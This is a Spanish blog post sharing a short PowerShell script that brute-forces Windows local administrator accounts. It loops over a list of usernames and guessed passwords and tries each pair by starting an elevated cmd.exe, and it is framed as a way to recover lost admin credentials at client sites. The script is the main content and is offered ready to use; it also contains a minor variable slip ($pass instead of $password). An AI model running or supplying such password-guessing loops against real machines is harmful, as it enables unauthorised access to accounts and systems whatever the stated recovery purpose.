«Fuerza Bruta» windows con Powershell

En mi empresa han pasado muchos técnicos y en algunos clientes sin DC el usuario administrador y su password local es un enigma… eso si por lo general mirando el historico mas o menos se sigue un patron..

Hice este código simple en PS donde hacemos un simple bucle en el que testeamos unos usuarios y unas contraseñas


$usernamel =("adm", "administrador")         
        
$passwordl = @(("pass1", "pass2","pass3", "pass4"))
            
        

foreach($username in $usernamel){

$username

    foreach($password in $passwordl){


              $pass

              $startWithElevatedRights = "cmd.exe"

                $credentials = New-Object System.Management.Automation.PSCredential -ArgumentList @($username,(ConvertTo-SecureString -String $password -AsPlainText -Force))
                $ps = Start-Process -PassThru -FilePath powershell -Credential $credentials -ArgumentList '-noprofile -command &{Start-Process ',  $startWithElevatedRights, ' -Wait -verb runas}'

                $ps.WaitForExit()


    }



}

En caso de que funcione se ejecuta el CMD con derechos del usuario

Puede interesar ver el articulo:

Add Comment

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.